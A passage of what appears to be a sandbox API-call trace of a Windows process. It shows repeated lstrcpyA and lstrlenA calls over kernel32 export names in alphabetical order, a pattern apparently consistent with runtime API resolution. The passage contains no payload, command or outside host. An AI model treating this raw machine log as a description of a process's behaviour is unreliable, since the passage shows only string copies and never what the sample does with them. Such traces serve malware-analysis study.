(lpString="BUILDCOMMDCBA") returned 13 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.579] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.579] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.579] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.579] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.579] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.579] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.579] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.579] lstrlenA (lpString="CANCELIO") returned 8 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.579] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.579] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.579] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.579] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.579] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.579] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.580] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.580] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.580] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.580] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.580] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.580] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.580] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.580] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.580] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.580] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.580] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.580] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.580] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.580] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.580] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.580] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.580] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.580] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.580] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.581] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.581] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.581] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.581] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.581] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.581] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.581] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.581] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.581] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.581] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.581] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.581] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.581] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.581] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.581] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.581] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.581] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.581] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.581] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.582] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.582] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.582] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.582] lstrlenA (lpString="COPYFILEA") returned 9 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.582] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.582] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.582] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.582] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.582] lstrlenA (lpString="COPYFILEW") returned 9 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.582] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.582] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.582] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.582] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.582] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.582] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.582] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.582] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.582] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.582] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.583] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.583] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.583] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.583] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.583] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.583] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.583] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.583] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.583] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.583] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.583] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.583] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.583] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.583] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.583] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.583] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.583] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.583] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.583] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.584] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.584] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.584] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.584] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.584] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.584] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.584] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.584] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.584] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.584] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.584] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.584] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.584] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.584] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.584] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.584] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.584] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.584] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.584] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.585] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.585] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.585] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.585] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.585] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.585] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.585] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.585] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.585] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.585] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.585] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.585] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.585] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.585] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.585] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.585] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.585] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.585] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.585] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.586] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.586] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.586] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.586] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.586] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.586] lstrcpyA (in: 